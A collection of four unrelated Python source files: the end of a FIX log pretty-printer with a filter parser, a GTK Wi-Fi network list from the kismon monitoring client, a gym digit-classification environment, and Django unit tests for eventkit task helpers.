while index < len(expression) and expression[index] == "&":
index = parse_simple_expression(expression, stack, index + 1)
stack.append(OperatorAnd())
return index
def parse_simple_expression(expression, stack, index):
strlen = len(expression)
if index < strlen and expression[index] == "(":
index = parse_expression(expression, stack, index + 1)
if index >= strlen or expression[index] != ')':
raise ValueError("missing closing parenthesis: '%s'" % expression)
# consume closing parenthesis
index += 1
elif index < strlen and expression[index] == "!":
index = parse_simple_expression(expression, stack, index + 1)
stack.append(OperatorNot())
else:
index = parse_const_expression(expression, stack, index)
return index
def parse_const_expression(expression, stack, index):
index, tag = parse_number(expression, index)
if expression[index:index + 2] == "!=":
index, value = parse_value(expression, index + 2)
stack.append(TagNotEqualExpression(tag, value))
elif expression[index:index + 1] == "=":
index, value = parse_value(expression, index + 1)
stack.append(TagEqualExpression(tag, value))
else:
stack.append(TagExpression(tag))
return index
def parse_number(expression, index):
start = index
strlen = len(expression)
while index < strlen and expression[index].isdigit():
index += 1
if index == start:
raise ValueError("number expected in expression: '%s'" % expression)
return (index, expression[start:index])
def parse_value(expression, index):
start = index
strlen = len(expression)
while index < strlen and expression[index] not in (')', '&', '|'):
index += 1
return (index, expression[start:index])
def get_expression_stack(expression):
stack = []
index = parse_expression(expression, stack, 0)
if index != len(expression):
raise ValueError("failed to parse expression: '%s'" % expression)
return stack
def eval_expression(filter_stack, msg_dict):
index = len(filter_stack) - 1
index, result = filter_stack[index].evaluate(msg_dict, filter_stack, index)
return result
def parse_enums(xml_field):
enum_list = xml_field.getElementsByTagName('value')
enum_hashtable = dict()
for element in enum_list:
number = element.attributes['enum'].value
if number not in enum_hashtable:
enum_hashtable[number] = element.attributes['description'].value
return enum_hashtable
def parse_dict(dict_file):
try:
config = ConfigParser()
user_config_dir = appdirs.user_config_dir('fixpp', 'secwall')
config.read(os.path.join(user_config_dir, 'fixpp.conf'))
xmldoc = minidom.parse(config.get("quicklink", dict_file))
except Exception as e:
sys.stderr.write(e.message + '\nQuick link lookup failed for '
+ dict_file + "\n")
xmldoc = minidom.parse(dict_file)
fields = xmldoc.getElementsByTagName('fields')
field_list = fields[0].getElementsByTagName('field')
int_hashtable = dict()
for field in field_list:
number = field.attributes['number'].value
if number not in int_hashtable:
int_hashtable[number] = [field.attributes['name'].value,
parse_enums(field)]
return int_hashtable
def make_tag_value_list(line, separator):
def make_pair(token):
if len(token) == 1:
token.append(None)
return token
return [make_pair(token.split('='))
for token in line.split(separator)[:-1]]
def print_messages(args):
int_hashtable = parse_dict(args.dict_file)
if args.input_file:
log = open(args.input_file)
else:
log = sys.stdin
if args.filter:
stack = get_expression_stack(args.filter)
else:
stack = None
for line in log:
if not args.separator:
# auto-detect separator using the sequence number field
# that should always be present
args.separator = re.search("([^0-9])34=", line).group(1)
pairs = make_tag_value_list(line, args.separator)
if stack and not eval_expression(stack, multimap.MultiMap(pairs)):
continue
ret = []
for tag, value in pairs:
if value is None:
ret.append(tag)
else:
try:
tag_entry = int_hashtable[tag]
tag_name = str(tag_entry[0])
if args.number:
tag_name += "(" + tag + ")"
if tag_entry[1]:
value_name = str(tag_entry[1][value])
if args.number:
value_name += "(" + value + ")"
else:
value_name = value
except Exception:
tag_name = tag
value_name = value
if args.long_format:
ret.append("%30s: %s" % (tag_name, value_name))
else:
ret.append("%s=%s" % (tag_name, value_name))
if ret:
if args.long_format:
print(" \n".join(ret))
print()
else:
print(",".join(ret))
if args.input_file:
log.close()
def _main():
usage = "%(prog)s [-h] -d DICT_FILE [-l] [-n] [-e FILTER] " \
"[-s SEPARATOR] [input_file]\n" \
"Expression can be used for filtering messages, syntax:\n" \
" expr = and_expr\n" \
" | and_expr '|' expr\n" \
" and_expr = simple_expr\n" \
" | simple_expr '&' and_expr\n" \
" simple_expr = tag\n" \
" | tag '=' value\n" \
" | tag '!=' value\n" \
" | '(' expr ')'\n" \
" | '!' simple_expr\n"
parser = argparse.ArgumentParser(description="FIX log pretty printer",
usage=usage)
parser.add_argument("-d", dest='dict_file', required=True,
help='Dictionary file path')
parser.add_argument("-l", action='store_true', default=False,
dest='long_format', required=False,
help='Use long format (separate line for every pair)')
parser.add_argument("-n", action='store_true', default=False,
dest='number', required=False,
help='Show field numbers')
parser.add_argument("-e", action='store', dest='filter', required=False,
help='expression to filter the output')
parser.add_argument("-s", dest='separator', required=False,
help='Use this separator instead of auto-detection')
parser.add_argument("input_file", help='Input file (stdin by default)',
nargs='?')
args = parser.parse_args()
print_messages(args)
if __name__ == "__main__":
_main()
|
|
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository import GObject
from gi.repository import GLib
try:
from kismon.client import decode_cryptset
import kismon.utils as utils
except ImportError:
from client import decode_cryptset
import utils
class NetworkList:
def __init__(self, networks, locate_network_on_map, on_signal_graph):
self.network_lines = {}
self.network_iter = {}
self.network_selected = None
self.locate_network_on_map = locate_network_on_map
self.on_signal_graph = on_signal_graph
self.networks = networks
self.value_cache = {}
for key in ('time', 'crypt', 'server', 'type', 'channel', 'signal', 'ssid'):
self.value_cache[key] = {}
self.networks.notify_add_list["network_list"] = self.add_network
self.networks.notify_remove_list["network_list"] = self.remove_network
self.networks.disable_refresh_functions.append(self.pause)
self.networks.resume_refresh_functions.append(self.resume)
self.treeview = Gtk.TreeView()
self.treeview.connect("button-press-event", self.on_treeview_clicked)
num=0
self.columns=("BSSID", "Type", "SSID", "Ch", "Crypt",
"First Seen", "Last Seen", "Latitude", "Longitude",
"Signal dbm", "Comment", "Servers")
for column in self.columns:
renderer = Gtk.CellRendererText()
if column == "Comment":
renderer.set_property('editable', True)
renderer.connect("editing-started", self.on_comment_editing_started)
elif column == "Signal dbm":
renderer = Gtk.CellRendererProgress()
tvcolumn = Gtk.TreeViewColumn(column, renderer, text=num)
self.treeview.append_column(tvcolumn)
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
tvcolumn.set_sort_column_id(num)
tvcolumn.set_clickable(True)
tvcolumn.set_resizable(True)
tvcolumn.connect("clicked", self.on_column_clicked)
tvcolumn.num = num
if column == "Signal dbm":
tvcolumn.add_attribute(renderer, "value", 12)
num+=1
self.treeview.show()
self.store = Gtk.ListStore(
GObject.TYPE_STRING, #mac
GObject.TYPE_STRING, #type
GObject.TYPE_STRING, #ssid
GObject.TYPE_INT, #channel
GObject.TYPE_STRING, #cryptset
GObject.TYPE_STRING, #firsttime
GObject.TYPE_STRING, #lasttime
GObject.TYPE_FLOAT, #lat
GObject.TYPE_FLOAT, #lon
GObject.TYPE_INT, #signal dbm
GObject.TYPE_STRING, #comment
GObject.TYPE_STRING, #servers
GObject.TYPE_INT, #signal dbm + 100 (progressbar)
)
self.treeview.set_model(self.store)
scrolled = Gtk.ScrolledWindow()
scrolled.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scrolled.add(self.treeview)
frame = Gtk.Frame()
frame.set_label("Networks")
frame.add(scrolled)
self.widget = frame
self.store.set_sort_column_id(6, Gtk.SortType.DESCENDING)
network_popup = Gtk.Menu()
locate_item = Gtk.MenuItem.new_with_label('Copy field')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_copy_field)
locate_item = Gtk.MenuItem.new_with_label('Copy network')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_copy_network)
locate_item = Gtk.MenuItem.new_with_label('Locate on map')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_locate_marker)
signal_item = Gtk.MenuItem.new_with_label('Signal graph')
network_popup.append(signal_item)
signal_item.connect("activate", self.on_signal_graph)
network_popup.show_all()
self.network_popup = network_popup
self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)
def on_column_clicked(self, widget):
self.treeview.set_search_column(widget.num)
def on_comment_editing_started(self, widget, editable, path):
editable.connect("editing-done", self.on_comment_editing_done)
def on_comment_editing_done(self, widget):
network = self.networks.get_network(self.network_selected)
network['comment'] = widget.get_text()
self.add_network(self.network_selected)
def prepare_network_servers(self, value):
if len(value) == 0 or value == None:
servers = None
servers_str = None
else:
servers = []
for server in value:
if server.endswith(':2501'): # remove the default port
server = server.rsplit(':', 1)[0]
servers.append(server)
servers_str = ", ".join(sorted(servers))
try:
servers = self.value_cache['server'][servers_str]
except KeyError:
servers = GObject.Value(GObject.TYPE_STRING, servers_str)
self.value_cache['server'][servers_str] = servers
return servers
def prepare_network_time(self, value):
try:
result = self.value_cache['time'][value]
except KeyError:
result = GObject.Value(GObject.TYPE_STRING, utils.format_timestamp(value))
self.value_cache['time'][value] = result
return result
def prepare_network_crypt(self, value):
try:
crypt = self.value_cache['crypt'][value]
except KeyError:
crypt = GObject.Value(GObject.TYPE_STRING, decode_cryptset(value, True))
self.value_cache['crypt'][value] = crypt
return crypt
def prepare_network_channel(self, value):
try:
channel = self.value_cache['channel'][value]
except KeyError:
channel = GObject.Value(GObject.TYPE_INT, value)
self.value_cache['channel'][value] = channel
return channel
def prepare_network_type(self, value):
try:
network_type = self.value_cache['type'][value]
except KeyError:
network_type = GObject.Value(GObject.TYPE_STRING, value)
self.value_cache['type'][value] = network_type
return network_type
def prepare_network_signal(self, value):
try:
return self.value_cache['signal'][value]
except KeyError:
pass
""" Wifi cards report different ranges for the signal, some use
-1xx to 0 and others 0 to 100. The CellRendererProgress needs a
percentage value between 0 and 100, so we convert the value if
necessary.
"""
if -100 <= value <= 0:
signal_strength = value + 100
elif value < -100:
signal_strength = 0
elif 1 <= value <= 100:
signal_strength = value
else:
signal_strength = 0
signal = GObject.Value(GObject.TYPE_INT, value)
signal_strength = GObject.Value(GObject.TYPE_INT, signal_strength)
self.value_cache['signal'][value] = (signal, signal_strength)
return signal, signal_strength
def prepare_network_ssid(self, value):
if value == "":
ssid_str = "<no ssid>"
else:
ssid_str = value
try:
ssid = self.value_cache['ssid'][ssid_str]
except KeyError:
ssid = GObject.Value(GObject.TYPE_STRING, ssid_str)
self.value_cache['ssid'][ssid_str] = ssid
return ssid
def prepare_network_coordinate(self, value):
if value == 0.0:
return None
else:
return value
def add_network(self, mac):
network = self.networks.get_network(mac)
""" The Gtk.ListStore will convert every Python-type value to its
GObject equivalent. Most of the prepare_network_* functions cache
and return the value as a GObject, this speed things up as we have
a lot of duplicate values. Furthermore a None value is faster then
an zero size string, so we replace it where possible.
"""
if "signal_dbm" not in network or len(network["signal_dbm"]) != 3:
signal = 0
else:
signal = network["signal_dbm"]["last"]
signal, signal_strength = self.prepare_network_signal(signal)
if network['comment'] == '':
comment = None
else:
comment = network['comment']
line = [mac,
self.prepare_network_type(network["type"]),
self.prepare_network_ssid(network["ssid"]),
self.prepare_network_channel(network["channel"]),
self.prepare_network_crypt(network["cryptset"]),
self.prepare_network_time(network["firsttime"]),
self.prepare_network_time(network["lasttime"]),
self.prepare_network_coordinate(network["lat"]),
self.prepare_network_coordinate(network["lon"]),
signal,
comment,
self.prepare_network_servers(network["servers"]),
signal_strength
]
try:
old_line = self.network_lines[mac]
except:
old_line = None
self.network_lines[mac] = line
if mac in self.network_iter:
network_iter = self.network_iter[mac]
num = 0
for value in line:
if old_line is not None and old_line.pop(0) == value:
num += 1
continue
self.store.set_value(network_iter, num, value)
num += 1
else:
self.network_iter[mac] = self.store.append(line)
adj = self.treeview.get_vadjustment()
self.scroll_value = int(adj.get_value())
if self.scroll_value == 0:
GLib.idle_add(self.treeview.scroll_to_point, -1, 0)
def remove_network(self, mac):
try:
network_iter = self.network_iter[mac]
except KeyError:
return
self.store.remove(network_iter)
del(self.network_iter[mac])
def pause(self):
self.treeview.freeze_child_notify()
self.treeview.set_model(None)
def resume(self):
self.treeview.set_model(self.store)
self.treeview.thaw_child_notify()
def on_treeview_clicked(self, treeview, event):
x = int(event.x)
y = int(event.y)
pthinfo = treeview.get_path_at_pos(x, y)
if pthinfo is None:
return
path, col, cellx, celly = pthinfo
treeview.grab_focus()
treeview.set_cursor(path, col, 0)
network_iter = self.store.get_iter(path)
mac = self.store.get_value(network_iter, 0)
self.network_selected = mac
self.column_selected = self.columns.index(col.get_title())
if event.type == Gdk.EventType.DOUBLE_BUTTON_PRESS: # double click
self.on_locate_marker(None)
elif event.button == 3: # right click
self.network_popup.popup(None, None, None, 0, event.button, event.time, )
def on_locate_marker(self, widget):
if self.locate_network_on_map is not None:
self.locate_network_on_map(self.network_selected)
def on_copy_field(self, widget):
selected_text = self.network_lines[self.network_selected][self.column_selected]
self.set_clipboard(selected_text)
def on_copy_network(self, widget):
text = []
num = 0
for column in self.columns:
text.append("%s: %s" % (column, self.network_lines[self.network_selected][num]))
num += 1
self.set_clipboard('\n'.join(text))
def set_clipboard(self, text):
self.clipboard.set_text("%s" % text, -1)
self.clipboard.store()
|
|
import logging
import math
import gym
from gym import spaces
from gym.utils import seeding
import numpy as np
import sys
import cv2
import math
class ClassifyEnv(gym.Env):
def __init__(self, trainSet, target, batch_size=1000, accuracy_mode=False):
"""
Data set is a tuple of
[0] input data: [nSamples x nInputs]
[1] labels: [nSamples x 1]
Example data sets are given at the end of this file
"""
self.t = 0 # Current batch number
self.t_limit = 0 # Number of batches if you need them
self.batch = batch_size # Number of images per batch
self.accuracy_mode = accuracy_mode
self.seed()
self.viewer = None
self.trainSet = trainSet
self.target = target
nInputs = np.shape(trainSet)[1]
high = np.array([1.0]*nInputs)
self.action_space = spaces.Box(np.array(0,dtype=np.float32), \
np.array(1,dtype=np.float32))
self.observation_space = spaces.Box(np.array(0,dtype=np.float32), \
np.array(1,dtype=np.float32))
self.state = None
self.trainOrder = None
self.currIndx = None
def seed(self, seed=None):
''' Randomly select from training set'''
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self):
''' Initialize State'''
#print('Lucky number', np.random.randint(10)) # same randomness?
self.trainOrder = np.random.permutation(len(self.target))
self.t = 0 # timestep
self.currIndx = self.trainOrder[self.t:self.t+self.batch]
self.state = self.trainSet[self.currIndx,:]
return self.state
def step(self, action):
'''
Judge Classification, increment to next batch
action - [batch x output] - softmax output
'''
y = self.target[self.currIndx]
m = y.shape[0]
if self.accuracy_mode:
p = np.argmax(action, axis=1)
accuracy = (float(np.sum(p==y)) / self.batch)
reward = accuracy
else:
log_likelihood = -np.log(action[range(m),y])
loss = np.sum(log_likelihood) / m
reward = -loss
if self.t_limit > 0: # We are doing batches
reward *= (1/self.t_limit) # average
self.t += 1
done = False
if self.t >= self.t_limit:
done = True
self.currIndx = self.trainOrder[(self.t*self.batch):\
(self.t*self.batch + self.batch)]
self.state = self.trainSet[self.currIndx,:]
else:
done = True
obs = self.state
return obs, reward, done, {}
# -- Data Sets ----------------------------------------------------------- -- #
def digit_raw():
'''
Converts 8x8 scikit digits to
[samples x pixels] ([N X 64])
'''
from sklearn import datasets
digits = datasets.load_digits()
z = (digits.images/16)
z = z.reshape(-1, (64))
return z, digits.target
def mnist_784():
'''
Converts 28x28 mnist digits to
[samples x pixels] ([N X 784])
'''
import mnist
z = (mnist.train_images()/255)
z = preprocess(z,(28,28))
z = z.reshape(-1, (784))
return z, mnist.train_labels()
def mnist_256():
'''
Converts 28x28 mnist digits to [16x16]
[samples x pixels] ([N X 256])
'''
import mnist
z = (mnist.train_images()/255)
z = preprocess(z,(16,16))
z = z.reshape(-1, (256))
return z, mnist.train_labels()
def mnist_256_test():
'''
Converts 28x28 mnist digits to [16x16]
[samples x pixels] ([N X 256])
'''
import mnist
z = (mnist.test_images()/255)
z = preprocess(z,(16,16))
z = z.reshape(-1, (256))
return z, mnist.test_labels()
def mnist_patch9():
'''
Crops 28x28 mnist digits to a [9x9] patch
[samples x pixels] ([N X 81])
'''
import mnist
z = (mnist.train_images()/255)
z = preprocess(z,(28,28),patchDim=(9,9),patchCorner=(12,12))
z = z.reshape(-1, (81))
return z, mnist.train_labels()
'''
This part can be put in step if we want to try classification from patches
---
if self.patchSize != None: # (add self.patchSize to class)
z = np.reshape(self.state,(len(self.currIndx),28,28))
corner = (np.random.randint(28 - self.patchSize),\
np.random.randint(28 - self.patchSize) )
#corner = (12,12)
z = preprocess(z,(28,28),patchDim=(9,9),patchCorner=corner)
z = z.reshape(-1, (81))
self.state = z
---
'''
def preprocess(img,size, patchCorner=(0,0), patchDim=None, unskew=True):
"""
Resizes, crops, and unskewes images
"""
if patchDim == None: patchDim = size
nImg = np.shape(img)[0]
procImg = np.empty((nImg,size[0],size[1]))
# Unskew and Resize
if unskew == True:
for i in range(nImg):
procImg[i,:,:] = deskew(cv2.resize(img[i,:,:],size),size)
# Crop
cropImg = np.empty((nImg,patchDim[0],patchDim[1]))
for i in range(nImg):
cropImg[i,:,:] = procImg[i,patchCorner[0]:patchCorner[0]+patchDim[0],\
patchCorner[1]:patchCorner[1]+patchDim[1]]
procImg = cropImg
return procImg
def deskew(image, image_shape, negated=True):
"""
This method deskwes an image using moments
:param image: a numpy nd array input image
:param image_shape: a tuple denoting the image`s shape
:param negated: a boolean flag telling whether the input image is negated
:returns: a numpy nd array deskewd image
source: https://github.com/vsvinayak/mnist-helper
"""
# negate the image
if not negated:
image = 255-image
# calculate the moments of the image
m = cv2.moments(image)
if abs(m['mu02']) < 1e-2:
return image.copy()
# caclulating the skew
skew = m['mu11']/m['mu02']
M = np.float32([[1, skew, -0.5*image_shape[0]*skew], [0,1,0]])
img = cv2.warpAffine(image, M, image_shape, \
flags=cv2.WARP_INVERSE_MAP|cv2.INTER_LINEAR)
return img
|
|
# -*- coding: utf-8 -*-
import json
import logging
import os
import signal
from unittest.mock import patch, call, Mock, MagicMock
import requests
import requests_mock
from django.conf import settings
from django.test import TestCase
from django.utils import timezone
from eventkit_cloud.tasks.enumerations import TaskState
from eventkit_cloud.tasks.helpers import (
get_style_files,
get_file_paths,
get_last_update,
get_metadata_url,
get_osm_last_update,
cd,
get_arcgis_metadata,
get_metadata,
get_message_count,
get_all_rabbitmq_objects,
delete_rabbit_objects,
get_data_package_manifest,
update_progress,
find_in_zip,
)
from eventkit_cloud.tasks.helpers import progressive_kill
logger = logging.getLogger(__name__)
class TestHelpers(TestCase):
"""
Test Task Helpers
"""
def test_cd(self):
current_path = os.getcwd()
parent_path = os.path.dirname(current_path)
with cd(parent_path):
self.assertEqual(parent_path, os.getcwd())
self.assertEqual(current_path, os.getcwd())
@patch("eventkit_cloud.tasks.helpers.time.sleep")
@patch("eventkit_cloud.tasks.helpers.os")
def test_progressive_kill(self, mock_os, mock_sleep):
pid = 1
# Test no PID.
mock_os.killpg.side_effect = [OSError()]
progressive_kill(pid)
mock_os.reset_mock
# Test kill with SIGTERM
mock_os.killpg.side_effect = [None, OSError()]
progressive_kill(pid)
mock_os.killpg.has_calls([call(pid, signal.SIGTERM)])
mock_os.reset_mock
# Test kill with SIGKILL
mock_os.killpg.side_effect = [None, None]
progressive_kill(pid)
mock_os.killpg.has_calls([call(pid, signal.SIGTERM), call(pid, signal.SIGTERM)])
mock_os.reset_mock
def test_get_style_files(self):
for file in get_style_files():
self.assertTrue(os.path.isfile(file))
def test_get_file_paths(self):
self.assertTrue(os.path.abspath(__file__) in get_file_paths(os.path.dirname(__file__)))
@patch("eventkit_cloud.tasks.helpers.get_osm_last_update")
def test_get_last_update(self, mock_get_osm_last_update):
test_url = "https://test"
test_type = "osm"
get_last_update(test_url, test_type)
mock_get_osm_last_update.assert_called_once_with(test_url, cert_info=None)
@patch.object(requests.Session, "get")
def test_get_osm_last_update(self, mock_get):
test_url = "https://test/interpreter"
expected_url = "https://test/timestamp"
expected_time = "2017-12-29T13:09:59Z"
mock_get.return_value.content.decode.return_value = expected_time
returned_time = get_osm_last_update(test_url)
mock_get.assert_called_once_with(expected_url)
self.assertEqual(expected_time, returned_time)
mock_get.side_effect = Exception("FAIL")
returned_time = get_osm_last_update(test_url)
self.assertIsNone(returned_time)
def test_get_metadata_url(self):
test_url = "https://test"
expected_value = "https://test?request=GetCapabilities"
returned_value = get_metadata_url(test_url, "wcs")
self.assertEqual(expected_value, returned_value)
returned_value = get_metadata_url(test_url, "arcgis-raster")
self.assertEqual(test_url, returned_value)
@patch("os.path.isfile")
@patch("eventkit_cloud.tasks.helpers.create_license_file")
@patch("eventkit_cloud.tasks.helpers.get_metadata_url")
@patch("eventkit_cloud.tasks.helpers.get_last_update")
@patch("eventkit_cloud.tasks.helpers.DataProviderTaskRecord")
def test_get_metadata(
self,
mock_DataProviderTaskRecord,
mock_get_last_update,
mock_get_metadata_url,
mock_create_license_file,
mock_isfile,
):
run_uid = "1234"
stage_dir = os.path.join(settings.EXPORT_STAGING_ROOT, str(run_uid))
expected_layers = ["layer1", "layer2"]
expected_type = "vector"
mock_create_license_file.return_value = expected_license_file = {"/license.txt": "/license.txt"}
mock_isfile.return_value = True
mock_get_metadata_url.return_value = expected_metadata_url = "https://some.url/metadata"
# Fill out the behavior for mocked ExportRun by adding a provider task with
# subtasks for each file in all_file_list
mock_get_last_update.return_value = expected_last_update = "2018-10-29T04:35:02Z\n"
mocked_provider_subtasks = []
sample_file = "F1.gpkg"
mocked_provider_task = MagicMock()
mocked_provider_task.name = expected_provider_task_name = "example_name"
mocked_provider_task.status = TaskState.COMPLETED.value
mocked_provider_task.provider.slug = expected_provider_slug = "example_slug"
mocked_provider_task.tasks.filter.return_value = mocked_provider_subtasks
mocked_provider_task.uid = expected_provider_task_uid = "5678"
expected_stage_preview_file = f"{stage_dir}/{expected_provider_slug}/preview.jpg"
expected_archive_preview_file = f"data/{expected_provider_slug}/preview.jpg"
mocked_provider_task.preview.get_file_path.side_effect = [
expected_archive_preview_file,
expected_stage_preview_file,
]
mps = MagicMock()
mps.result.filename = sample_file
mps.name = "something EPSG:4326"
mps.status = TaskState.COMPLETED.value
mocked_provider_subtasks.append(mps)
expected_stage_file = f"{stage_dir}/{expected_provider_slug}/{sample_file}"
expected_archive_file = f"data/{expected_provider_slug}/{sample_file}"
# This is *look* backwards because the value will get called and resolved before the key in the method.
mps.result.get_file_path.side_effect = [expected_stage_file, expected_archive_file]
mocked_data_provider = MagicMock()
mocked_data_provider.slug = expected_provider_slug
mocked_data_provider.export_provider_type.type_name = "osm"
mocked_data_provider.service_copyright = expected_copyright = "mocked_copyright"
mocked_data_provider.config = f"cert_var: {expected_provider_slug}"
mocked_data_provider.service_description = expected_data_provider_desc = "example_description"
mocked_data_provider.layers = expected_layers
mocked_data_provider.data_type = expected_type
mocked_data_provider.level_from = expected_level_from = 0
mocked_data_provider.level_to = expected_level_to = 12
mocked_provider_task.provider = mocked_data_provider
mocked_queryset = MagicMock()
mocked_queryset.return_value = [mocked_provider_task]
mocked_queryset.first.return_value = mocked_provider_task
mocked_queryset.__iter__.return_value = [mocked_provider_task]
mock_DataProviderTaskRecord.objects.select_related().prefetch_related().prefetch_related().filter.return_value = ( # NOQA
mocked_queryset
)
mocked_run = MagicMock()
mocked_run.uid = run_uid
mocked_run.job.uid = expected_job_uid = "7890"
mocked_run.job.include_zipfile = True
mocked_run.job.name = expected_job_name = "mocked_job_name"
mocked_run.job.bounds_geojson = expected_aoi = "mocked_job_aoi"
mocked_run.job.extents = expected_extents = [-1, -1, 0, 0]
mocked_run.job.event = expected_project_name = "mocked_project_name"
mocked_run.job.description = expected_job_desc = "mocked_job_desc"
mocked_run.job.projections.all.return_value = [Mock(srid=4326)]
mocked_run.data_provider_task_records.all.return_value = [mocked_provider_task]
mocked_provider_task.run = mocked_run
expected_date = timezone.now().strftime("%Y%m%d")
file_ext = os.path.splitext(sample_file)[1]
include_files = {
expected_stage_preview_file: expected_archive_preview_file,
expected_stage_file: expected_archive_file,
}
include_files.update(expected_license_file)
expected_metadata = {
"aoi": expected_aoi,
"bbox": expected_extents,
"data_sources": {
"example_slug": {
"copyright": expected_copyright,
"description": expected_data_provider_desc,
"files": [
{
"file_path": f"data/{expected_provider_slug}/{sample_file}",
"file_ext": file_ext,
"full_file_path": os.path.join(stage_dir, expected_provider_slug, sample_file),
"projection": "4326",
}
],
"last_update": expected_last_update,
"metadata": expected_metadata_url,
"name": expected_provider_task_name,
"slug": expected_provider_slug,
"type": expected_type,
"uid": expected_provider_task_uid,
"layers": expected_layers,
"level_from": expected_level_from,
"level_to": expected_level_to,
}
},
"date": expected_date,
"description": expected_job_desc,
"has_elevation": False,
"has_raster": False,
"has_vector": True,
"include_files": include_files,
"name": expected_job_name,
"project": expected_project_name,
"projections": [4326],
"run_uid": run_uid,
"url": f"{getattr(settings, 'SITE_URL')}/status/{expected_job_uid}",
}
returned_metadata = get_metadata([mocked_provider_task.uid])
self.maxDiff = None
self.assertEqual(expected_metadata, returned_metadata)
def test_get_arcgis_metadata(self):
example_metadata = {
"stuff": "test",
"include_files": "files",
"data_sources": {"osm": {"files": [{"data": "here", "full_file_path": "here"}]}},
}
expected_metadata = {"stuff": "test", "data_sources": {"osm": {"files": [{"data": "here"}]}}}
self.assertEqual(expected_metadata, get_arcgis_metadata(example_metadata))
@requests_mock.Mocker()
def test_get_all_rabbitmq_objects(self, requests_mocker):
example_api = "http://example/api/"
queues = "queues"
expected_queues = [{"name": "queue1"}, {"name": "queue2"}]
res1 = {"page_count": 2, "page": 1, "items": [{"name": "queue1"}]}
res2 = {"page_count": 2, "page": 2, "items": [{"name": "queue2"}]}
requests_mocker.get(example_api + queues + "?page=1&page_size=100&pagination=true", text=json.dumps(res1))
requests_mocker.get(example_api + queues + "?page=2&page_size=100&pagination=true", text=json.dumps(res2))
result = get_all_rabbitmq_objects(example_api, queues)
self.assertEqual(result, expected_queues)
with self.assertRaises(Exception):
requests_mocker.get(example_api + queues + "?page=1&page_size=100&pagination=true", text="ERROR")
get_all_rabbitmq_objects(example_api, "WRONG")
@patch("eventkit_cloud.tasks.helpers.get_all_rabbitmq_objects")
def test_delete_rabbit_objects(self, mock_get_all_rabbitmq_objects):
example_api = "https://example/api"
example_vhost = "abcd_vhost"
example_queues = [
{"name": "queue1", "consumers": 0, "messages": 0, "vhost": example_vhost},
{"name": "queue2", "consumers": 1, "messages": 1, "vhost": example_vhost},
]
example_exchanges = [
{"name": "exchange1", "vhost": example_vhost},
{"name": "exchange2", "vhost": example_vhost},
]
return_values = {"queues": example_queues, "exchanges": example_exchanges}
mock_get_all_rabbitmq_objects.side_effect = lambda api, rabbit_class: return_values[rabbit_class]
# Deletes only the empty queue
with requests_mock.Mocker() as requests_mocker:
requests_mocker.delete(f"{example_api}/queues/{example_vhost}/{example_queues[0]['name']}")
delete_rabbit_objects(example_api)
mock_get_all_rabbitmq_objects.assert_called_once_with(example_api, "queues")
self.assertEquals(requests_mocker.call_count, 1)
mock_get_all_rabbitmq_objects.reset_mock()
# Deletes only the empty queue and exchanges
with requests_mock.Mocker() as requests_mocker:
requests_mocker.delete(f"{example_api}/queues/{example_vhost}/{example_queues[0]['name']}")
requests_mocker.delete(f"{example_api}/exchanges/{example_vhost}/{example_exchanges[0]['name']}")
requests_mocker.delete(f"{example_api}/exchanges/{example_vhost}/{example_exchanges[1]['name']}")
delete_rabbit_objects(example_api, rabbit_classes=["queues", "exchanges"])
mock_get_all_rabbitmq_objects.assert_has_calls(
[call(example_api, "queues"), call(example_api, "exchanges")]
)
self.assertEquals(requests_mocker.call_count, 3)
mock_get_all_rabbitmq_objects.reset_mock()
# Deletes all queues
with requests_mock.Mocker() as requests_mocker:
requests_mocker.delete(f"{example_api}/queues/{example_vhost}/{example_queues[0]['name']}")
requests_mocker.delete(f"{example_api}/queues/{example_vhost}/{example_queues[1]['name']}")
delete_rabbit_objects(example_api, force=True)
mock_get_all_rabbitmq_objects.assert_called_once_with(example_api, "queues")
self.assertEquals(requests_mocker.call_count, 2)
mock_get_all_rabbitmq_objects.reset_mock()
@patch("eventkit_cloud.tasks.helpers.get_all_rabbitmq_objects")
def test_get_message_count(self, mock_get_all_rabbitmq_objects):
queue = "queue2"
expected_queues = [{"name": "queue1"}, {"name": "queue2", "messages": "5"}]
expected_messages = "5"
mock_get_all_rabbitmq_objects.return_value = expected_queues
messages = get_message_count(queue)
self.assertEqual(messages, expected_messages)
@patch("builtins.open")
def get_data_package_manifest(self, mock_open):
example_name = "example_name"
example_uid = "97f0d96a-ee1f-482e-9fe8-e6f716ed3144"
example_file_path = "data/osm_tiles/test-4326-osm_tiles-20201112-u.gpkg"
example_ignored_file = "ignore/me.txt"
# TODO: Use lxml tools if installing in the future to make this diff be based on structure not text value.
expected_xml = f"""<MissionPackageManifest version="2">
<Configuration>
<Parameter name="uid" value="{example_uid}"/>
<Parameter name="name" value="{example_name}"/>
</Configuration>
<Contents>
<Content ignore="false" zipEntry="{example_file_path}">
<Parameter name="contentType" value="External Native Data"/>
</Content>
<Content ignore="true" zipEntry="{example_ignored_file}"/>
<Content ignore="false" zipEntry="manifest/manifest.xml"/>
</Contents>
</MissionPackageManifest>"""
example_metadata = {
"name": example_name,
"url": "http://cloud.eventkit.test/status/b4e7e799-8eb6-4d52-98b4-3fcaed619cc9",
"description": "test",
"project": "test",
"projections": [4326],
"date": "20201112",
"run_uid": example_uid,
"data_sources": {
"osm_tiles": {
"uid": "cce7742e-8916-4b69-b5fe-d30baec09199",
"slug": "osm_tiles",
"name": "OpenStreetMap Tiles",
"files": [
{
"file_path": example_file_path,
"full_file_path": f"/{example_file_path}",
"file_ext": ".gpkg",
"projection": "4326",
}
],
"type": "raster",
"description": "OSM Description",
"last_update": None,
"metadata": "https://osm.url/tiles/default_pc/{z}/{x}/{y}.png",
"copyright": "OpenStreetMap Contributors",
}
},
"bbox": (1, 1, 1.5, 1.5),
"aoi": '{"type": "FeatureCollection", "crs": {"type": "name", "properties": {"name": "EPSG:4326"}}, '
'"features": []}',
"has_raster": True,
"has_elevation": False,
"include_files": [example_ignored_file],
}
get_data_package_manifest(example_metadata, ignore_files=[example_ignored_file])
expected_output_file = os.path.join(settings.EXPORT_STAGING_ROOT, str(example_uid), "manifest.xml")
mock_open.assert_called_once_with(expected_output_file, "w")
